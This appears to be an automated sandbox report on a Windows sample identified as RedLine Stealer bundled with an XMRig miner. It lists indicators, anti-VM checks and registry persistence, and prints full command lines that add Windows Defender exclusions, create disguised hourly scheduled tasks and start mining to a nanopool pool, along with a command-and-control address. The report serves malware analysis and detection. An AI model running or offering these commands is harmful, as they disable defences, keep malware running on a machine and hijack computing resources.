Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28/11/2022, 06:26
Behavioral task
behavioral1
Sample
ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe
Resource
win10v2004-20220812-en
General
-
Target
ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe
-
Size
12.7MB
-
MD5
73da708b6e7cb62ed7a8dbfb82248915
-
SHA1
736532c733926259633b1f3c1fef02f623c68445
-
SHA256
ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46
-
SHA512
f7e449390017aba0828d8b1e526aa19bf37902ebaae7983e3cdacb44414d8882315e3b0c873408cc1932d21125bdd59986fbeb413f1ea1d17551d9dfa13df19c
-
SSDEEP
393216:YXmmhVLcncVXz1UBS8bbLSvxgoKZGuriqRxQuYf:e+a1+vLpoKYurdfe
Malware Config
Extracted
redline
185.215.113.69:15544
-
auth_value
1372cd9fae57c6645ea8737ff631eb3c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/2004-139-0x00000000005B0000-0x00000000005D8000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/files/0x0006000000022f34-144.dat xmrig behavioral1/files/0x0006000000022f34-146.dat xmrig behavioral1/memory/788-150-0x0000000000850000-0x0000000001378000-memory.dmp xmrig behavioral1/memory/2056-154-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2056-155-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2056-157-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2056-159-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2056-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2056-166-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/files/0x0006000000023358-230.dat xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
pid Process 4248 Updater.exe 788 Setup.exe 2972 System.exe 4504 dllhost.exe 4892 winlogson.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Setup.exe -
resource yara_rule behavioral1/memory/4084-132-0x0000000000400000-0x000000000147D000-memory.dmp themida behavioral1/memory/4084-134-0x0000000000400000-0x000000000147D000-memory.dmp themida behavioral1/memory/4084-148-0x0000000000400000-0x000000000147D000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe\\Cortana.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\PLMKAHMCIHMKAHL = "C:\\Windows\\system32\\Updater.exe" ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DPLHGIDHGAOHGIO = "C:\\Windows\\system32\\Setup.exe" ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDriveService = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Windows\\System32\\SecurityHealthSystray.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvStray = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe" dllhost.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\Setup.exe ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe File opened for modification C:\Windows\SysWOW64\Setup.exe ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe File created C:\Windows\SysWOW64\Updater.exe ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe File opened for modification C:\Windows\SysWOW64\Updater.exe ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4084 ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4248 set thread context of 2004 4248 Updater.exe 84 PID 788 set thread context of 2056 788 Setup.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4144 788 WerFault.exe 85 -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 444 schtasks.exe 4616 schtasks.exe 4236 schtasks.exe 4204 schtasks.exe 2840 schtasks.exe 4640 schtasks.exe 3104 schtasks.exe 448 schtasks.exe 2140 schtasks.exe 1332 schtasks.exe 1648 schtasks.exe 2064 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 788 Setup.exe 788 Setup.exe 788 Setup.exe 788 Setup.exe 788 Setup.exe 2004 vbc.exe 2004 vbc.exe 2972 System.exe 1756 powershell.exe 1756 powershell.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe 4504 dllhost.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 788 Setup.exe Token: SeLockMemoryPrivilege 2056 ngentask.exe Token: SeLockMemoryPrivilege 2056 ngentask.exe Token: SeDebugPrivilege 2004 vbc.exe Token: SeDebugPrivilege 2972 System.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 4504 dllhost.exe Token: SeLockMemoryPrivilege 4892 winlogson.exe Token: SeLockMemoryPrivilege 4892 winlogson.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2056 ngentask.exe 4892 winlogson.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4084 wrote to memory of 4248 4084 ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe 83 PID 4084 wrote to memory of 4248 4084 ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe 83 PID 4084 wrote to memory of 4248 4084 ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe 83 PID 4248 wrote to memory of 2004 4248 Updater.exe 84 PID 4248 wrote to memory of 2004 4248 Updater.exe 84 PID 4248 wrote to memory of 2004 4248 Updater.exe 84 PID 4248 wrote to memory of 2004 4248 Updater.exe 84 PID 4084 wrote to memory of 788 4084 ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe 85 PID 4084 wrote to memory of 788 4084 ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe 85 PID 4248 wrote to memory of 2004 4248 Updater.exe 84 PID 788 wrote to memory of 2064 788 Setup.exe 87 PID 788 wrote to memory of 2064 788 Setup.exe 87 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 788 wrote to memory of 2056 788 Setup.exe 89 PID 2004 wrote to memory of 2972 2004 vbc.exe 97 PID 2004 wrote to memory of 2972 2004 vbc.exe 97 PID 2004 wrote to memory of 2972 2004 vbc.exe 97 PID 2972 wrote to memory of 3144 2972 System.exe 100 PID 2972 wrote to memory of 3144 2972 System.exe 100 PID 2972 wrote to memory of 3144 2972 System.exe 100 PID 3144 wrote to memory of 2212 3144 cmd.exe 102 PID 3144 wrote to memory of 2212 3144 cmd.exe 102 PID 3144 wrote to memory of 2212 3144 cmd.exe 102 PID 3144 wrote to memory of 1756 3144 cmd.exe 103 PID 3144 wrote to memory of 1756 3144 cmd.exe 103 PID 3144 wrote to memory of 1756 3144 cmd.exe 103 PID 2972 wrote to memory of 4504 2972 System.exe 104 PID 2972 wrote to memory of 4504 2972 System.exe 104 PID 2972 wrote to memory of 4504 2972 System.exe 104 PID 4504 wrote to memory of 3940 4504 dllhost.exe 105 PID 4504 wrote to memory of 3940 4504 dllhost.exe 105 PID 4504 wrote to memory of 3940 4504 dllhost.exe 105 PID 4504 wrote to memory of 4948 4504 dllhost.exe 106 PID 4504 wrote to memory of 4948 4504 dllhost.exe 106 PID 4504 wrote to memory of 4948 4504 dllhost.exe 106 PID 4504 wrote to memory of 4808 4504 dllhost.exe 107 PID 4504 wrote to memory of 4808 4504 dllhost.exe 107 PID 4504 wrote to memory of 4808 4504 dllhost.exe 107 PID 4504 wrote to memory of 4540 4504 dllhost.exe 111 PID 4504 wrote to memory of 4540 4504 dllhost.exe 111 PID 4504 wrote to memory of 4540 4504 dllhost.exe 111 PID 4504 wrote to memory of 4244 4504 dllhost.exe 112 PID 4504 wrote to memory of 4244 4504 dllhost.exe 112 PID 4504 wrote to memory of 4244 4504 dllhost.exe 112 PID 4504 wrote to memory of 1564 4504 dllhost.exe 114 PID 4504 wrote to memory of 1564 4504 dllhost.exe 114 PID 4504 wrote to memory of 1564 4504 dllhost.exe 114 PID 4504 wrote to memory of 1644 4504 dllhost.exe 116 PID 4504 wrote to memory of 1644 4504 dllhost.exe 116 PID 4504 wrote to memory of 1644 4504 dllhost.exe 116 PID 4504 wrote to memory of 1152 4504 dllhost.exe 120 PID 4504 wrote to memory of 1152 4504 dllhost.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe"C:\Users\Admin\AppData\Local\Temp\ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\SysWOW64\Updater.exe"C:\Windows\system32\Updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\System.exe"C:\Users\Admin\AppData\Local\Temp\System.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"5⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:3940
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:4948
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:4236
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:4808
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:444
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:4540
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:4244
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:1644
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk5408" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:3936
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk5408" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:1152
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:448
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk3835" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:3180
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk3835" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:4616
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk356" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:4840
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk356" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk6583" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:4724
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk6583" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵PID:2760
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵PID:1276
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:3696
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4892
-
-
-
-
-
-
-
C:\Windows\SysWOW64\Setup.exe"C:\Windows\system32\Setup.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 3 /tn "MicrosoftEdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\DataSellSetupMutex\RegVBS.exe.exe" /f3⤵
- Creates scheduled task(s)
PID:2064
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe --algo rx/0 --donate-level 0 --max-cpu-usage 60 -oxmr-eu1.nanopool.org:14444 -u 42CqPp3vCd3EurYa4S5wYdFJzNFEtgwc7VmmGzq4BQtz7rWKxVyjQQ8hFvB4P49FmCeLu8NrfN5t1S8oCbkaaVd34YvGvQN3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2056
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 788 -s 14563⤵
- Program crash
PID:4144
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 788 -ip 7881⤵PID:5044
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD58eac424b39ecd7724237708242536dce
SHA1dbd058d840422fcaaf1d6897564e73be3641f7d3
SHA256a43dad593d702d374a6f7d8f0a7de4a1e98a8a7edbf25cc01c45b7f26e60a229
SHA5121ed33db65161a5ee089f4f030c42ac5168be0d5fd041422575d23e2f414a477b18397f583d7d53a744df716798f79de407bcb33ab8602644371c44291fa0c7fa
-
Filesize
60KB
MD58eac424b39ecd7724237708242536dce
SHA1dbd058d840422fcaaf1d6897564e73be3641f7d3
SHA256a43dad593d702d374a6f7d8f0a7de4a1e98a8a7edbf25cc01c45b7f26e60a229
SHA5121ed33db65161a5ee089f4f030c42ac5168be0d5fd041422575d23e2f414a477b18397f583d7d53a744df716798f79de407bcb33ab8602644371c44291fa0c7fa
-
Filesize
7.8MB
MD56f4532e49d65c2be0355b222f96e06e8
SHA1268e90ce25e01bbb205f6ae3f493f8da36a61480
SHA256acaf8e844ef7f4f65033ebe9546c394cc21bce175dac8b59199106309f04e5ab
SHA51285f495b0bbd0673df376f44e912f9a0a8d201c2843f1a9efa64d93703a2d8ba2b6fa2638a747e79604715d26ddfc07de26ba43d03adf86290d928b442bf09207
-
Filesize
315B
MD5c465700b27e8387849ca1e4ef9b115cf
SHA1139398a2136c7c40cfb48385d0a48bde89d6b94c
SHA256e2afe75858da3d4d9cebb3303bd671f90863d82e447c5a9a195b9d90a39cb067
SHA5127dd6d8ee2ed46e5d83ecc7a85ef0734e56e8564d5a2c5778ae656e5953e55ff9781c0a9df5739ab7601d3801ae6711c06248955c97d3e8d1ac29c51fe2661b93
-
Filesize
1KB
MD59d06a9235fdb2d61f92103c8d690b134
SHA1087dff70c2f5b647983abe9f668a1704a0574a45
SHA256bbd04cc6634065ee1bac547c611a86d5a9108fc97cd15d2fa4037c8977018353
SHA512501dff9f99d0454fda6fd1a2676299edec682df1888fd1270b9b90bc90978aa1447b5f863df663cec63fa9e3d0e57a1a0117b9cd41d10a07b7f8518afccbdf61
-
Filesize
56KB
MD5139cd19f65a027137d58a8845a894d62
SHA1bad5bc463d84d49ab5dc1dd6afa7be100a30ba47
SHA25600a0b9e83b8d1af1650e8ddeaa5cd4729e4a8e55fcae4f006e04113e87afebe6
SHA5127a866f1609ec070cb612af2253d86b92ea5f39d9526e600a3d4e4e6440a1f000696f82d4f14d3853f38a592c9cccc600174128d8d612836d344350f4ce35551e
-
Filesize
56KB
MD5139cd19f65a027137d58a8845a894d62
SHA1bad5bc463d84d49ab5dc1dd6afa7be100a30ba47
SHA25600a0b9e83b8d1af1650e8ddeaa5cd4729e4a8e55fcae4f006e04113e87afebe6
SHA5127a866f1609ec070cb612af2253d86b92ea5f39d9526e600a3d4e4e6440a1f000696f82d4f14d3853f38a592c9cccc600174128d8d612836d344350f4ce35551e
-
Filesize
11.1MB
MD57aa0deb8925c933c29ee5fdc02d50468
SHA18fc02b2c924dc1495f5658e3d9598bcbdeced726
SHA2569fc1224786b535bff3448c5a93df7ac7e724ae6dbfc09048e3d475e11fa9b6b6
SHA512ac0e38190e59e26dd365ece18ee4acd77f44ac5ca89088a11545fc3214eb79bba1fef40446fbcce6c9b683e1afa846fa257a8fcf027d63a5da98996df0f58d32
-
Filesize
11.1MB
MD57aa0deb8925c933c29ee5fdc02d50468
SHA18fc02b2c924dc1495f5658e3d9598bcbdeced726
SHA2569fc1224786b535bff3448c5a93df7ac7e724ae6dbfc09048e3d475e11fa9b6b6
SHA512ac0e38190e59e26dd365ece18ee4acd77f44ac5ca89088a11545fc3214eb79bba1fef40446fbcce6c9b683e1afa846fa257a8fcf027d63a5da98996df0f58d32
-
Filesize
2.4MB
MD537947dda264ac7fc5b1dc64fad3fa9a0
SHA1cb0f79ee93767a52d2ed9cae9cd1ff1f8a2c0c2c
SHA2560144ea67343805ac6c8d06e12eb882fe9d35e1ff3526372f9cb7c3bf4ad0b057
SHA5126e355444a591eec3c5b24c98958b212f8afb2cf137ffdc5d8b1b1a63ce70919fa70790cec47387ad0fe70d4a3c16edaa7146c851b3f5cd9aed6b4f348a28e147
-
Filesize
2.4MB
MD537947dda264ac7fc5b1dc64fad3fa9a0
SHA1cb0f79ee93767a52d2ed9cae9cd1ff1f8a2c0c2c
SHA2560144ea67343805ac6c8d06e12eb882fe9d35e1ff3526372f9cb7c3bf4ad0b057
SHA5126e355444a591eec3c5b24c98958b212f8afb2cf137ffdc5d8b1b1a63ce70919fa70790cec47387ad0fe70d4a3c16edaa7146c851b3f5cd9aed6b4f348a28e147